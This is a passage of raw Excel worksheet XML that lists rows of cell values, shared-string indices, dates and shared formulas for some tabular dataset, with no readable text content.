      <c r="O1034" s="1" t="s">
        <v>4469</v>
      </c>
      <c r="P1034" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1034" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1034" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1034" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="1">
        <v>14133.0</v>
      </c>
      <c r="B1035" s="2" t="s">
        <v>4473</v>
      </c>
      <c r="C1035" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1035" s="2" t="s">
        <v>4464</v>
      </c>
      <c r="E1035" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1035" s="1" t="s">
        <v>4474</v>
      </c>
      <c r="G1035" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1035" s="1" t="s">
        <v>4475</v>
      </c>
      <c r="I1035" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1035" s="1" t="s">
        <v>4467</v>
      </c>
      <c r="K1035" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="L1035" s="1">
        <v>8.0</v>
      </c>
      <c r="M1035" s="1">
        <v>10.0</v>
      </c>
      <c r="N1035" s="1" t="s">
        <v>4476</v>
      </c>
      <c r="O1035" s="1" t="s">
        <v>4469</v>
      </c>
      <c r="P1035" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1035" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1035" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1035" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="1">
        <v>14134.0</v>
      </c>
      <c r="B1036" s="2" t="s">
        <v>4477</v>
      </c>
      <c r="C1036" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1036" s="2" t="s">
        <v>4478</v>
      </c>
      <c r="E1036" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1036" s="1" t="s">
        <v>4465</v>
      </c>
      <c r="G1036" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1036" s="1" t="s">
        <v>4479</v>
      </c>
      <c r="I1036" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1036" s="1" t="s">
        <v>4467</v>
      </c>
      <c r="K1036" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="L1036" s="1">
        <v>8.0</v>
      </c>
      <c r="M1036" s="1">
        <v>10.0</v>
      </c>
      <c r="N1036" s="1" t="s">
        <v>2925</v>
      </c>
      <c r="O1036" s="1" t="s">
        <v>4469</v>
      </c>
      <c r="P1036" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1036" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1036" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1036" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="1">
        <v>14135.0</v>
      </c>
      <c r="B1037" s="2" t="s">
        <v>4480</v>
      </c>
      <c r="C1037" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1037" s="2" t="s">
        <v>4464</v>
      </c>
      <c r="E1037" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1037" s="1" t="s">
        <v>4481</v>
      </c>
      <c r="G1037" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1037" s="1" t="s">
        <v>4482</v>
      </c>
      <c r="I1037" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1037" s="1" t="s">
        <v>4467</v>
      </c>
      <c r="K1037" s="2" t="s">
        <v>4468</v>
      </c>
      <c r="L1037" s="1">
        <v>8.0</v>
      </c>
      <c r="M1037" s="1">
        <v>10.0</v>
      </c>
      <c r="N1037" s="1" t="s">
        <v>2256</v>
      </c>
      <c r="O1037" s="1" t="s">
        <v>4469</v>
      </c>
      <c r="P1037" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1037" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1037" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1037" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="1">
        <v>14161.0</v>
      </c>
      <c r="B1038" s="2" t="s">
        <v>4483</v>
      </c>
      <c r="C1038" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1038" s="2" t="s">
        <v>4484</v>
      </c>
      <c r="E1038" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1038" s="1" t="s">
        <v>23</v>
      </c>
      <c r="G1038" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1038" s="1" t="s">
        <v>4485</v>
      </c>
      <c r="I1038" s="1" t="s">
        <v>4486</v>
      </c>
      <c r="J1038" s="1" t="s">
        <v>4487</v>
      </c>
      <c r="K1038" s="2" t="s">
        <v>4488</v>
      </c>
      <c r="L1038" s="1">
        <v>4.0</v>
      </c>
      <c r="M1038" s="1">
        <v>11.0</v>
      </c>
      <c r="N1038" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O1038" s="1" t="s">
        <v>4489</v>
      </c>
      <c r="P1038" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1038" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1038" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1038" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="1">
        <v>14245.0</v>
      </c>
      <c r="B1039" s="2" t="s">
        <v>4490</v>
      </c>
      <c r="C1039" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1039" s="2" t="s">
        <v>4491</v>
      </c>
      <c r="E1039" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1039" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G1039" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1039" s="4">
        <v>44685.86875</v>
      </c>
      <c r="I1039" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1039" s="1" t="s">
        <v>4492</v>
      </c>
      <c r="K1039" s="2" t="s">
        <v>4493</v>
      </c>
      <c r="L1039" s="1">
        <v>10.0</v>
      </c>
      <c r="M1039" s="1">
        <v>31.0</v>
      </c>
      <c r="N1039" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O1039" s="1" t="s">
        <v>4494</v>
      </c>
      <c r="P1039" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1039" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1039" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1039" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="1">
        <v>14309.0</v>
      </c>
      <c r="B1040" s="2" t="s">
        <v>4495</v>
      </c>
      <c r="C1040" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1040" s="2" t="s">
        <v>4496</v>
      </c>
      <c r="E1040" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1040" s="1" t="s">
        <v>4497</v>
      </c>
      <c r="G1040" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1040" s="4">
        <v>44869.006944444445</v>
      </c>
      <c r="I1040" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1040" s="1" t="s">
        <v>4498</v>
      </c>
      <c r="K1040" s="2" t="s">
        <v>4499</v>
      </c>
      <c r="L1040" s="1">
        <v>3.0</v>
      </c>
      <c r="M1040" s="1">
        <v>5.0</v>
      </c>
      <c r="N1040" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1040" s="1" t="s">
        <v>4500</v>
      </c>
      <c r="P1040" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1040" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1040" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1040" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="1">
        <v>14310.0</v>
      </c>
      <c r="B1041" s="2" t="s">
        <v>4501</v>
      </c>
      <c r="C1041" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1041" s="2" t="s">
        <v>4496</v>
      </c>
      <c r="E1041" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1041" s="1" t="s">
        <v>4502</v>
      </c>
      <c r="G1041" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1041" s="4">
        <v>44869.38333333333</v>
      </c>
      <c r="I1041" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1041" s="1" t="s">
        <v>4498</v>
      </c>
      <c r="K1041" s="2" t="s">
        <v>4499</v>
      </c>
      <c r="L1041" s="1">
        <v>3.0</v>
      </c>
      <c r="M1041" s="1">
        <v>5.0</v>
      </c>
      <c r="N1041" s="1" t="s">
        <v>4503</v>
      </c>
      <c r="O1041" s="1" t="s">
        <v>4500</v>
      </c>
      <c r="P1041" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1041" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1041" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1041" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="1">
        <v>14311.0</v>
      </c>
      <c r="B1042" s="2" t="s">
        <v>4504</v>
      </c>
      <c r="C1042" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1042" s="2" t="s">
        <v>4496</v>
      </c>
      <c r="E1042" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1042" s="1" t="s">
        <v>4505</v>
      </c>
      <c r="G1042" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1042" s="4">
        <v>44869.47708333333</v>
      </c>
      <c r="I1042" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1042" s="1" t="s">
        <v>4498</v>
      </c>
      <c r="K1042" s="2" t="s">
        <v>4499</v>
      </c>
      <c r="L1042" s="1">
        <v>3.0</v>
      </c>
      <c r="M1042" s="1">
        <v>5.0</v>
      </c>
      <c r="N1042" s="1" t="s">
        <v>4506</v>
      </c>
      <c r="O1042" s="1" t="s">
        <v>4500</v>
      </c>
      <c r="P1042" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1042" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1042" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1042" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="1">
        <v>14312.0</v>
      </c>
      <c r="B1043" s="2" t="s">
        <v>4507</v>
      </c>
      <c r="C1043" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1043" s="2" t="s">
        <v>4496</v>
      </c>
      <c r="E1043" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1043" s="1" t="s">
        <v>4505</v>
      </c>
      <c r="G1043" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1043" s="4">
        <v>44869.478472222225</v>
      </c>
      <c r="I1043" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1043" s="1" t="s">
        <v>4498</v>
      </c>
      <c r="K1043" s="2" t="s">
        <v>4499</v>
      </c>
      <c r="L1043" s="1">
        <v>3.0</v>
      </c>
      <c r="M1043" s="1">
        <v>5.0</v>
      </c>
      <c r="N1043" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1043" s="1" t="s">
        <v>4500</v>
      </c>
      <c r="P1043" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1043" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1043" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1043" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="1">
        <v>14328.0</v>
      </c>
      <c r="B1044" s="2" t="s">
        <v>4508</v>
      </c>
      <c r="C1044" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1044" s="2" t="s">
        <v>4509</v>
      </c>
      <c r="E1044" s="2" t="s">
        <v>605</v>
      </c>
      <c r="F1044" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="G1044" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1044" s="4">
        <v>44838.87777777778</v>
      </c>
      <c r="I1044" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1044" s="1" t="s">
        <v>4510</v>
      </c>
      <c r="K1044" s="2" t="s">
        <v>4511</v>
      </c>
      <c r="L1044" s="1">
        <v>7.0</v>
      </c>
      <c r="M1044" s="1">
        <v>7.0</v>
      </c>
      <c r="N1044" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1044" s="1" t="s">
        <v>4512</v>
      </c>
      <c r="P1044" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1044" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1044" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1044" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="1">
        <v>14329.0</v>
      </c>
      <c r="B1045" s="2" t="s">
        <v>4513</v>
      </c>
      <c r="C1045" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1045" s="2" t="s">
        <v>4509</v>
      </c>
      <c r="E1045" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F1045" s="1" t="s">
        <v>2291</v>
      </c>
      <c r="G1045" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1045" s="4">
        <v>44838.8875</v>
      </c>
      <c r="I1045" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1045" s="1" t="s">
        <v>4510</v>
      </c>
      <c r="K1045" s="2" t="s">
        <v>4511</v>
      </c>
      <c r="L1045" s="1">
        <v>7.0</v>
      </c>
      <c r="M1045" s="1">
        <v>7.0</v>
      </c>
      <c r="N1045" s="1" t="s">
        <v>214</v>
      </c>
      <c r="O1045" s="1" t="s">
        <v>4512</v>
      </c>
      <c r="P1045" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1045" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1045" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1045" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="1">
        <v>14330.0</v>
      </c>
      <c r="B1046" s="2" t="s">
        <v>4514</v>
      </c>
      <c r="C1046" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1046" s="2" t="s">
        <v>4509</v>
      </c>
      <c r="E1046" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F1046" s="1" t="s">
        <v>2032</v>
      </c>
      <c r="G1046" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1046" s="4">
        <v>44838.89236111111</v>
      </c>
      <c r="I1046" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1046" s="1" t="s">
        <v>4510</v>
      </c>
      <c r="K1046" s="2" t="s">
        <v>4511</v>
      </c>
      <c r="L1046" s="1">
        <v>7.0</v>
      </c>
      <c r="M1046" s="1">
        <v>7.0</v>
      </c>
      <c r="N1046" s="1" t="s">
        <v>700</v>
      </c>
      <c r="O1046" s="1" t="s">
        <v>4512</v>
      </c>
      <c r="P1046" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1046" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1046" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1046" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="1">
        <v>14331.0</v>
      </c>
      <c r="B1047" s="2" t="s">
        <v>4515</v>
      </c>
      <c r="C1047" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1047" s="2" t="s">
        <v>4509</v>
      </c>
      <c r="E1047" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F1047" s="1" t="s">
        <v>2060</v>
      </c>
      <c r="G1047" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1047" s="4">
        <v>44838.915972222225</v>
      </c>
      <c r="I1047" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1047" s="1" t="s">
        <v>4510</v>
      </c>
      <c r="K1047" s="2" t="s">
        <v>4511</v>
      </c>
      <c r="L1047" s="1">
        <v>7.0</v>
      </c>
      <c r="M1047" s="1">
        <v>7.0</v>
      </c>
      <c r="N1047" s="1" t="s">
        <v>2618</v>
      </c>
      <c r="O1047" s="1" t="s">
        <v>4512</v>
      </c>
      <c r="P1047" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1047" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1047" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1047" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="1">
        <v>14352.0</v>
      </c>
      <c r="B1048" s="2" t="s">
        <v>4516</v>
      </c>
      <c r="C1048" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1048" s="2" t="s">
        <v>4517</v>
      </c>
      <c r="E1048" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1048" s="1" t="s">
        <v>4518</v>
      </c>
      <c r="G1048" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1048" s="1" t="s">
        <v>4519</v>
      </c>
      <c r="I1048" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1048" s="1" t="s">
        <v>4520</v>
      </c>
      <c r="K1048" s="2" t="s">
        <v>4521</v>
      </c>
      <c r="L1048" s="1">
        <v>5.0</v>
      </c>
      <c r="M1048" s="1">
        <v>14.0</v>
      </c>
      <c r="N1048" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O1048" s="1" t="s">
        <v>4522</v>
      </c>
      <c r="P1048" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1048" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1048" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1048" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="1">
        <v>14423.0</v>
      </c>
      <c r="B1049" s="2" t="s">
        <v>4523</v>
      </c>
      <c r="C1049" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1049" s="2" t="s">
        <v>4524</v>
      </c>
      <c r="E1049" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1049" s="1" t="s">
        <v>4525</v>
      </c>
      <c r="G1049" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1049" s="4">
        <v>44024.40277777778</v>
      </c>
      <c r="I1049" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1049" s="1" t="s">
        <v>4526</v>
      </c>
      <c r="K1049" s="2" t="s">
        <v>4527</v>
      </c>
      <c r="L1049" s="1">
        <v>1.0</v>
      </c>
      <c r="M1049" s="1">
        <v>1.0</v>
      </c>
      <c r="N1049" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1049" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P1049" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1049" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1049" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1049" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="1">
        <v>14424.0</v>
      </c>
      <c r="B1050" s="2" t="s">
        <v>4528</v>
      </c>
      <c r="C1050" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1050" s="2" t="s">
        <v>4529</v>
      </c>
      <c r="E1050" s="2" t="s">
        <v>2118</v>
      </c>
      <c r="F1050" s="1" t="s">
        <v>4530</v>
      </c>
      <c r="G1050" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1050" s="1" t="s">
        <v>4531</v>
      </c>
      <c r="I1050" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1050" s="1" t="s">
        <v>4532</v>
      </c>
      <c r="K1050" s="2" t="s">
        <v>4533</v>
      </c>
      <c r="L1050" s="1">
        <v>6.0</v>
      </c>
      <c r="M1050" s="1">
        <v>7.0</v>
      </c>
      <c r="N1050" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1050" s="1" t="s">
        <v>4534</v>
      </c>
      <c r="P1050" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1050" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1050" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1050" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="1">
        <v>14425.0</v>
      </c>
      <c r="B1051" s="2" t="s">
        <v>4535</v>
      </c>
      <c r="C1051" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1051" s="2" t="s">
        <v>4529</v>
      </c>
      <c r="E1051" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1051" s="1" t="s">
        <v>1659</v>
      </c>
      <c r="G1051" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1051" s="1" t="s">
        <v>4536</v>
      </c>
      <c r="I1051" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1051" s="1" t="s">
        <v>4532</v>
      </c>
      <c r="K1051" s="2" t="s">
        <v>4533</v>
      </c>
      <c r="L1051" s="1">
        <v>6.0</v>
      </c>
      <c r="M1051" s="1">
        <v>7.0</v>
      </c>
      <c r="N1051" s="1" t="s">
        <v>1547</v>
      </c>
      <c r="O1051" s="1" t="s">
        <v>4534</v>
      </c>
      <c r="P1051" s="1" t="s">
        <v>970</v>
      </c>
      <c r="Q1051" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1051" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1051" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="1">
        <v>14426.0</v>
      </c>
      <c r="B1052" s="2" t="s">
        <v>4537</v>
      </c>
      <c r="C1052" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1052" s="2" t="s">
        <v>4529</v>
      </c>
      <c r="E1052" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1052" s="1" t="s">
        <v>4538</v>
      </c>
      <c r="G1052" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1052" s="1" t="s">
        <v>4539</v>
      </c>
      <c r="I1052" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1052" s="1" t="s">
        <v>4532</v>
      </c>
      <c r="K1052" s="2" t="s">
        <v>4533</v>
      </c>
      <c r="L1052" s="1">
        <v>6.0</v>
      </c>
      <c r="M1052" s="1">
        <v>7.0</v>
      </c>
      <c r="N1052" s="1" t="s">
        <v>28</v>
      </c>
      <c r="O1052" s="1" t="s">
        <v>4534</v>
      </c>
      <c r="P1052" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1052" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1052" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1052" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="1">
        <v>14428.0</v>
      </c>
      <c r="B1053" s="2" t="s">
        <v>4540</v>
      </c>
      <c r="C1053" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1053" s="2" t="s">
        <v>4529</v>
      </c>
      <c r="E1053" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1053" s="1" t="s">
        <v>1919</v>
      </c>
      <c r="G1053" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1053" s="1" t="s">
        <v>4541</v>
      </c>
      <c r="I1053" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1053" s="1" t="s">
        <v>4532</v>
      </c>
      <c r="K1053" s="2" t="s">
        <v>4533</v>
      </c>
      <c r="L1053" s="1">
        <v>6.0</v>
      </c>
      <c r="M1053" s="1">
        <v>7.0</v>
      </c>
      <c r="N1053" s="1" t="s">
        <v>4542</v>
      </c>
      <c r="O1053" s="1" t="s">
        <v>4534</v>
      </c>
      <c r="P1053" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1053" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1053" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1053" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="1">
        <v>14430.0</v>
      </c>
      <c r="B1054" s="2" t="s">
        <v>4543</v>
      </c>
      <c r="C1054" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1054" s="2" t="s">
        <v>4529</v>
      </c>
      <c r="E1054" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F1054" s="1" t="s">
        <v>4544</v>
      </c>
      <c r="G1054" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1054" s="1" t="s">
        <v>4545</v>
      </c>
      <c r="I1054" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1054" s="1" t="s">
        <v>4532</v>
      </c>
      <c r="K1054" s="2" t="s">
        <v>4533</v>
      </c>
      <c r="L1054" s="1">
        <v>6.0</v>
      </c>
      <c r="M1054" s="1">
        <v>7.0</v>
      </c>
      <c r="N1054" s="1" t="s">
        <v>4546</v>
      </c>
      <c r="O1054" s="1" t="s">
        <v>4534</v>
      </c>
      <c r="P1054" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1054" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1054" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1054" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="1">
        <v>14504.0</v>
      </c>
      <c r="B1055" s="2" t="s">
        <v>4547</v>
      </c>
      <c r="C1055" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1055" s="2" t="s">
        <v>4548</v>
      </c>
      <c r="E1055" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1055" s="1" t="s">
        <v>371</v>
      </c>
      <c r="G1055" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1055" s="1" t="s">
        <v>4549</v>
      </c>
      <c r="I1055" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1055" s="1" t="s">
        <v>4550</v>
      </c>
      <c r="K1055" s="2" t="s">
        <v>4551</v>
      </c>
      <c r="L1055" s="1">
        <v>4.0</v>
      </c>
      <c r="M1055" s="1">
        <v>9.0</v>
      </c>
      <c r="N1055" s="1" t="s">
        <v>4552</v>
      </c>
      <c r="O1055" s="1" t="s">
        <v>4553</v>
      </c>
      <c r="P1055" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1055" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1055" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1055" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="1">
        <v>14505.0</v>
      </c>
      <c r="B1056" s="2" t="s">
        <v>4554</v>
      </c>
      <c r="C1056" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1056" s="2" t="s">
        <v>4548</v>
      </c>
      <c r="E1056" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1056" s="1" t="s">
        <v>2470</v>
      </c>
      <c r="G1056" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1056" s="1" t="s">
        <v>4555</v>
      </c>
      <c r="I1056" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1056" s="1" t="s">
        <v>4550</v>
      </c>
      <c r="K1056" s="2" t="s">
        <v>4551</v>
      </c>
      <c r="L1056" s="1">
        <v>4.0</v>
      </c>
      <c r="M1056" s="1">
        <v>9.0</v>
      </c>
      <c r="N1056" s="1" t="s">
        <v>4556</v>
      </c>
      <c r="O1056" s="1" t="s">
        <v>4553</v>
      </c>
      <c r="P1056" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1056" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1056" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1056" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="1">
        <v>14506.0</v>
      </c>
      <c r="B1057" s="2" t="s">
        <v>4557</v>
      </c>
      <c r="C1057" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1057" s="2" t="s">
        <v>4548</v>
      </c>
      <c r="E1057" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1057" s="1" t="s">
        <v>371</v>
      </c>
      <c r="G1057" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1057" s="1" t="s">
        <v>4558</v>
      </c>
      <c r="I1057" s="1" t="s">
        <v>25</v>
      </c>
